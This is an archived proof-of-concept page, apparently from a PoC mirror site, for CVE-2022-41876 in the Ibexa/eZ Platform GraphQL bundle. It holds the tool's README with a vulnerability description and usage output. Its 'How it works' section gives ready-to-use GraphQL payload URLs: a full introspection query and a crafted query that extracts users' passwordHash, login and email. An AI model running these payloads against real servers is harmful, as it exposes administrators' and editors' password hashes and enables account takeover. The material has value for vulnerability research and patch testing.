Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2022-41876 PoC — Ibexa GraphQL Bundle 安全漏洞

Source
https://github.com/Skileau/CVE-2022-41876
Associated Vulnerability
Title:Ibexa GraphQL Bundle 安全漏洞 (CVE-2022-41876)
Description:Ibexa GraphQL Bundle是Ibexa开源的一个 eZ 平台的 GraphQL 服务器,开源 Symfony CMS。 Ibexa GraphQL Bundle 2.3.12之前的版本和1.0.13版本存在安全漏洞,该漏洞源于其对敏感信息的不安全存储导致经过身份验证的对用户帐户的GraphQL查询会暴露创建或修改内容的用户(通常是管理员和编辑)的密码散列。
Description
PoC for CVE-2022-41876
Readme
<div align="center">
  <img alt="ibexa logo" width="600" src="./logo/Ibexa_Logo.png">
  <br><br>
  <img alt="Python3.9" src="https://img.shields.io/badge/Python-3.9+-informational">
  <img alt="current version" src="https://img.shields.io/badge/linux-supported-success"><br>
  <a href="https://twitter.com/intent/follow?screen_name=Skilo" title="Follow"><img src="https://img.shields.io/twitter/follow/askilow?label=Skilo&style=social" alt="Twitter Skilo"></a>
  <a href="https://twitter.com/intent/follow?screen_name=TahiTi" title="Follow"><img src="https://img.shields.io/twitter/follow/0xTahiTi?label=TahiTi&style=social" alt="Twitter TahiTi"></a>
  <br><br>
</div>

# CVE-2022-41876 - eZ Platform user information disclosure

A vulnerability emerged in eZ Platform letting an unauthenticated user access every contributor password's hash.
This PoC enumerates every possible GraphQL path leading to a 'User' object, and then requests these paths to retrieve users' confidential information.

## Usage

```
python3 cve-2022-41876.py -h
```
```
usage: cve-2022-41876.py [-h] [-t] [-f FILE] url

CVE-2022-41876 POC

positional arguments:
  url                   Target URL (specify the graphql endpoint)

optional arguments:
  -h, --help            show this help message and exit
  -t, --thread          Number of threads
  -f FILE, --file FILE  Local path to introspect file
```

## Results

![image](./example/poc.gif)

## How it works ?

The different steps followed by this tool to exploit the CVE are:

### Retrieving introspect file

The first step to exploit this CVE is to get an introspect.json file.
One way to retrieve it is to query the graphql endpoint of the server with the following payload:

```
https://<your-url>/graphql?query={__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name%20description%20locations%20args{...InputValue}}}}fragment%20FullType%20on%20__Type{kind%20name%20description%20fields(includeDeprecated:true){name%20description%20args{...InputValue}type{...TypeRef}isDeprecated%20deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name%20description%20isDeprecated%20deprecationReason}possibleTypes{...TypeRef}}fragment%20InputValue%20on%20__InputValue{name%20description%20type{...TypeRef}defaultValue}fragment%20TypeRef%20on%20__Type{kind%20name%20ofType{kind%20name%20ofType{kind%20name%20ofType{kind%20name%20ofType{kind%20name%20ofType{kind%20name%20ofType{kind%20name%20ofType{kind%20name}}}}}}}}
```

### Finding paths to User objects

Then the json given by the server can be used to extract all paths to the 'User' objects with the tool [graphql-enum-path](https://gitlab.com/dee-see/graphql-path-enum) like this:

![image](./example/graphql-enum.png)

### Requesting found paths to get users' data

Finally, once all the paths are found, a specific payload must be crafted this way and sent to the server:
```
https://<your-url>/graphql?query={element1{element2{element3{...{id,name,login,passwordHash,email,enabled,maxLogin}}}}}
```
Where elements correspond to the texts between bracket in the result of graphql-enum-path _(note that a query must be done for each path)_.

So, with the graphql-enum-path example above, the first payload would be:
```
https://<your-url>/graphql?query={_repository{location{contentInfo{contentType{creator{id,name,login,passwordHash,email,enabled,maxLogin}}}}}}
```

If the server is vulnerable to this CVE, it will respond to that query with a json file containing its users' data.

## References

[Hacktricks](https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/graphql)

[graphql-enum-path](https://gitlab.com/dee-see/graphql-path-enum)

## Credits

This PoC was created by [@Skilo](https://github.com/Skileau) and [@TahiTi](https://github.com/TahiTi)
File Snapshot

 [4.0K]  /data/pocs/2139d8a1d8864ee547079734d011d43fa6ee0e49
├── [7.7K]  cve-2022-41876.py
├── [4.0K]  example
│   ├── [145K]  graphql-enum.png
│   └── [115K]  poc.gif
├── [1.0K]  LICENSE
├── [4.0K]  logo
│   └── [ 55K]  Ibexa_Logo.png
├── [3.8K]  README.md
└── [  19]  requirements.txt

2 directories, 7 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.